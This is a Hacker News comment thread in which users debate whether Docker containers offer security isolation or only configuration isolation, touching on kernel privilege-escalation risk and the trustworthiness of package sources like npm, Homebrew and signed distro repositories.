Hacker News new | past | comments | ask | show | jobs | submit login

If your goal with containerization is to run trusted applications that just need bizarre systemwide configuration (possibly mutually-conflicting configuration), and keep that configuration separate from the host, then no, it's not a joke. This is a super useful use case for containers.

There's a strong case to be made that you should not be trusting Docker containers for untrusted code; they're just also for configuration isolation, not security isolation. After all, Docker runs on top of the Linux kernel.... If you want to run untrusted code, put it in a VM (kvm, bhyve, Xen, whatever).




I've never argued against the model of containerization for configuration isolation.

I'm arguing against this piece of software and examples it ships. Giving root to a trusted web app is not something sane.


Docker has kernel support from cgroups (and other features). Vastly different from a simple chroot. Maybe not as strong as full virtualization, but if we're worried about kernel bugs that allow privilege escalation, we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs.

Comparing Docker (or any Linux container using cgroups, like LXC) to chroot is not accurate.


Sure, I agree that Docker is pretty good, and much better at security than a simple chroot. But I think you should be worried about those kernel bugs if you're on Linux, and you should therefore be using actual virtualization (hardware, paravirt, whatever). And therefore, it shouldn't matter how much better Docker is at security than a simple chroot, except as far as defense-in-depth goes: it should not be the single thing you're relying on to sandbox untrusted applications.

That is, I am not saying that Docker is bad at security; I am saying that caring about how much security it provides is using the wrong tool for the job.


> we have to worry about everything running on the system, because it is all surface area for attacking kernel privilege escalation bugs

Usually "everything running on tbe system" is trusted code. The threat would be a bug in your software that allows remote code execution and could potentially be combined with a kernel bug to achieve privilege escalation.

The game changes significantly when you're giving arbitrary user-supplied code immediate access to make kernel calls. Now you're only one bug away from game over. And you're trusting the security of your whole system with a mechanism that wasn't really designed for security against untrusted code in the first place.


On that, we're agreed. The Docker ecosystem is scary for that reason. But, "trusted code" is also wishful thinking in most deployments. So many deployments are slapped together out of a bunch of random places. The way many people use Docker just takes that to a slightly more terrifying new level of risk.

e.g.: npm, go get, *brew (in particular, Homebrew, OMG; goddamned thing installs everything, from webservers to databases, to run as the same user with little warning about what kind of consequences that has), etc.

People do stupid shit all the time with their software deployments, is what I'm trying to say.

I just didn't want people to think Docker (or other Linux containers) are comparable to chroot. They really aren't the same thing.


npm, go get, home-brew..It is alright to me, in fact. I would rather take the risk and trust them, than doing so many manually things. They could introduce safety risk, same as you buy a can of food from a superstore and eat it "as the same user with little warning about what kind of consequences that has".


I've made no suggestion of doing anything manually. That would likely be even more dangerous.

There are well-known, and well-understood, automated methods of providing a (mostly) trustworthy source for software installation. RPM+yum on CentOS, deb+apt-get on Debian/Ubuntu. The packages can be signed and verified (so you know you're getting what the vendor packaged), the OS-standard sources are open source and easy for third parties to check and used on millions of machines (so you know manipulation is likely to be spotted quickly), easy to verify the versions you have with one command, easy to update to newer versions when security issues arise, easy to verify the files currently installed match (or don't) the ones that the package shipped with. And, it is relatively easy to package ones own tools and put them into a local repository, using the same methods to insure safe delivery to all of your systems.

I understand using other methods of locally providing packages. And, I understand that sometimes you have to go outside the vendor provided packages (and can't build your own, using the same best practices). But, to imagine that you can/should trust a big blob of data grabbed from the internet and splooshed onto your system (sometimes as root!) using a pipe to /bin/sh, is ridiculous. Don't do that in an automated fashion without explicitly checking out what you're being delivered. And, I would probably opt to host my own private repo of those things, so that I can re-verify any time there are changes before they get splooshed out to all of my systems.

This is basic operations stuff here, and yet folks keep reinventing the wheel, poorly, and aggressively marketing it as a superior wheel.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: